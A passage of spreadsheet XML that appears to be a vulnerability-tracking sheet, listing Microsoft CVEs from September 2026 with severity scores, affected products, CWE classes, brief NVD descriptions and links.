      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77908</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78439</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78442</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78456</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022</t>
        </is>
      </c>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78462</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78463</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78504</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78505</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78507</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78511</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78512</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78514</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78517</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78518</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78519</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78521</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
